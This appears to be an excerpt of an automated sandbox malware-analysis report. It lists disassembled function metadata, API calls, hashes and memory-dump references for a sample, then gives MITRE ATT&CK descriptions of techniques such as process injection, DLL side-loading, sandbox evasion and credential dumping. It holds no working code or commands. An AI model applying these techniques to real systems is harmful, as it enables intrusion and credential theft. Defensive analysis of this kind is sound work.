Instruction ID: 2a383879a18b340c0930032a8cf319d967c999f02e3f80e72b63f21f47647863
Opcode Fuzzy Hash: 60bf7d218402633b1d105d046759d02c08c67947dfb88bcf4c182425a6e8b8ef
Instruction Fuzzy Hash: 62F12974A056098FCB00DFADC0849AEFBF1BF44318B118A59D895DB758E739EA45CF81

Function 008F29B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 008F2A31

Strings

NaN, xrefs: 008F29B1

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: a576e0566464027d2abf6924a1731b6552ad1a6da8401d345f04abd73d5e6366
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: 77410C71605629CBDB24DF28C484766BBE1FF84714B298299DE48CF25AD372DC428B90

Function 6C2A3080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2A3101

Strings

NaN, xrefs: 6C2A3081

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: 147aecb33a3452be4f6da7bb11ace020caf237ebb8d7868ae158b4acdf9eb442
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: 1E4118B1A05619CBCB10CF5DC480785B7E1BF85705B29C6A9EC488F74AD332DC478B90

Function 6C324B80 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C324BBA
strlen.MSVCRT ref: 6C324C3D
strlen.MSVCRT ref: 6C324CC0
strlen.MSVCRT ref: 6C324D43

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1cb60eb886c1982193baaa81a12819fdec4edbea988ace5ff891b3659aa2a271
Instruction ID: 23d6fa6dc24bd61b0be846c018921bccf51807fec1452c8d4c22fb57d0cfa430
Opcode Fuzzy Hash: 1cb60eb886c1982193baaa81a12819fdec4edbea988ace5ff891b3659aa2a271
Instruction Fuzzy Hash: 26E138B4A046058FCB00DF6DC184AAEFBF1BF44318B148A69E895DBB54DB35E905CF91

Function 6C324380 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3243BA
strlen.MSVCRT ref: 6C32443D
strlen.MSVCRT ref: 6C3244C0
strlen.MSVCRT ref: 6C324543

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 35c7c96069a95030f91d26fe8911043b60c6898d232f420a2d3eb9c10ed614c9
Instruction ID: ede15f7dc0274f9eab16884ba76c110cdd7670fe114432878c683e930df52a23
Opcode Fuzzy Hash: 35c7c96069a95030f91d26fe8911043b60c6898d232f420a2d3eb9c10ed614c9
Instruction Fuzzy Hash: 01E138B4A046458FCB00DFADC1849AEFBF1BF45318B108A69D8A5DBB54DB39E905CF81

Function 6C2ADFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C2ADFAE
strlen.MSVCRT ref: 6C2ADFC1

Strings

basic_string: construction from null is not valid, xrefs: 6C2ADFE3

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: d3352ce4dd7b6ebccf42a8379a45a9c7da079b60b5972119f91ecd9e089b0442
Instruction ID: 247b8154011c5ccd06119d7a000a729cb116556fa66436a0f075823b83b456f9
Opcode Fuzzy Hash: d3352ce4dd7b6ebccf42a8379a45a9c7da079b60b5972119f91ecd9e089b0442
Instruction Fuzzy Hash: 1F114272E042008FC700FF7EC94549AB7F5AB9A314F85C96AEC4887709E634D4198FA7

Function 008F2F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 008F2E97
fputc.MSVCRT ref: 008F2F07
memset.MSVCRT ref: 008F2FC2

Strings

o, xrefs: 008F2F5E

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: 42feae7bade30001268d1136aa665e62b8e3d7f702a19f3be0e1573677da9d9c
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: 5A31F37290460DCFCB10CF78C1946AABBF1FB88340F258659DA89EB702E734E940CB94

Function 6C2A3616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2A3567
fputc.MSVCRT ref: 6C2A35D7
memset.MSVCRT ref: 6C2A3692

Strings

o, xrefs: 6C2A362E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: 9ec7bd7769ef21d7a3265022874617dd1d771f76847608b3ffe88972ac8596ce
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: C9312572A0860A8FCB00CFA9C184799BBF1BF4C355F158659ED89ABB51E734E906CB40

Function 008F3424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 008F338F
fputc.MSVCRT ref: 008F33F1

Strings

@, xrefs: 008F342A

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: 12adac612311f94fae0eace8019af368557aeea5fca14c1ea440a6b5ca3d4842
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 6911E4B1A042088BCB15CF38D1847A9BBA1FB89704F258559EE89DF34ADB34EE00CB55

Function 6C2A3AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2A3A5F
fputc.MSVCRT ref: 6C2A3AC1

Strings

@, xrefs: 6C2A3AFA

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: b454814ea5f6e97ca94381e2538fbe27b1d3cadf4468e10c47c1adffacf08a3e
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: 8D11FEB1A15229CBCB01DFA8C580789BBF1BF45305F258699ED996FB5BD334E802CB44

Function 008F18B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 008F191E

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 008F18FF
Unknown error, xrefs: 008F18B2

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: aaa7514e64985f7048a4c241d9678720c6faa7fac236f531d552955d939e023b
Instruction ID: f1f801819ed0175fd6d8c68fbe9bf7970a8fc219d3a0fd32d26ac9b68cb82673
Opcode Fuzzy Hash: aaa7514e64985f7048a4c241d9678720c6faa7fac236f531d552955d939e023b
Instruction Fuzzy Hash: 3F0188B0508B45DBD704AF15E58842ABFF1FF89350F464898E6C986265DB3298A8C747

Function 6C2B7561 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2B7583

Part of subcall function 6C303E00: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C2B7596), ref: 6C303E63

strlen.MSVCRT ref: 6C2B75F4
strlen.MSVCRT ref: 6C2B7662
strlen.MSVCRT ref: 6C2B76D6

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: d9373e49bd447522a876bb646f7db0d8a0197fd916d7615fb80d8c90ffee5db0
Instruction ID: 9f0085c6a7121691e27c5eaee9fe381c13ad844ea2b24cb49efb5b718e548145
Opcode Fuzzy Hash: d9373e49bd447522a876bb646f7db0d8a0197fd916d7615fb80d8c90ffee5db0
Instruction Fuzzy Hash: 70514975A05A118FCB00EF29C08865DFBF6BF49308F4185ADD981AF725CB31A849CF92

Function 008F6B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,008F6C81,?,?,?,?,?,?,00000000,008F4F24), ref: 008F6B87
InitializeCriticalSection.KERNEL32(?,?,?,?,008F6C81,?,?,?,?,?,?,00000000,008F4F24), ref: 008F6BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,008F6C81,?,?,?,?,?,?,00000000,008F4F24), ref: 008F6BD0
EnterCriticalSection.KERNEL32(?,?,?,?,008F6C81,?,?,?,?,?,?,00000000,008F4F24), ref: 008F6BF8

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: d9033f21439ddcf6f8525f3085e662078e2d5f880aaabe8f301729cc1937bacc
Instruction ID: af13dd5b250fa92317c6e0b5637546f0ef2ca5420c43a03296ded78f564e3d25
Opcode Fuzzy Hash: d9033f21439ddcf6f8525f3085e662078e2d5f880aaabe8f301729cc1937bacc
Instruction Fuzzy Hash: F11144B19082188ADB10BB7CE9C997A77E5FB11310F150A65D782C7224F731E8E4C79B

Function 6C2A8080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C2A81A1), ref: 6C2A80A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C2A81A1), ref: 6C2A80E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C2A81A1), ref: 6C2A80F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C2A81A1), ref: 6C2A8118

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 567a1b1bee119c1e001a872f2c0b09eacd799540fc6aa595ae5615887867cd6f
Instruction ID: 129ba71653747c273c6184eb9dae4815851377b44335245870912b4ac9426cc9
Opcode Fuzzy Hash: 567a1b1bee119c1e001a872f2c0b09eacd799540fc6aa595ae5615887867cd6f
Instruction Fuzzy Hash: 5211A1B1A062498BDF00EBAD94C625A7BF8EB27314F510926DC42D7B00E631D485CBA7

Function 008F2000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,008F21D3,?,?,?,?,?,008F17E8), ref: 008F200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,008F21D3,?,?,?,?,?,008F17E8), ref: 008F2035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,008F21D3,?,?,?,?,?,008F17E8), ref: 008F203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,008F21D3,?,?,?,?,?,008F17E8), ref: 008F205C

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: d630651eb4b4b9e1579615270be4a2d50aca14e62698eab334af655d6f656afc
Instruction ID: ed4c865656ea1659899be9280e4c85ab6ff86baf5fe358f68cbbdcb2951ce691
Opcode Fuzzy Hash: d630651eb4b4b9e1579615270be4a2d50aca14e62698eab334af655d6f656afc
Instruction Fuzzy Hash: B8F0A4765007058FDB107FB9D88493A7BA4FA84740F054428DF44C7324EB30E85ACBA7

Function 6C29AB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C29AB5E
TlsGetValue.KERNEL32 ref: 6C29AB85
GetLastError.KERNEL32 ref: 6C29AB8C
LeaveCriticalSection.KERNEL32 ref: 6C29ABAC

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 9ed1bcd81578f9beba8dc41b7d0efaa5cf25410c2685a19c7f9181e225e93b99
Instruction ID: 0998ade3269e44b021e0910ac0c1a728158576da90a021ad7484ca60156782eb
Opcode Fuzzy Hash: 9ed1bcd81578f9beba8dc41b7d0efaa5cf25410c2685a19c7f9181e225e93b99
Instruction Fuzzy Hash: 81F0A4B6E0070ACFDB00BF79D4C554A7BB8EB76258B050168EE444B705D630E548CBA7

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

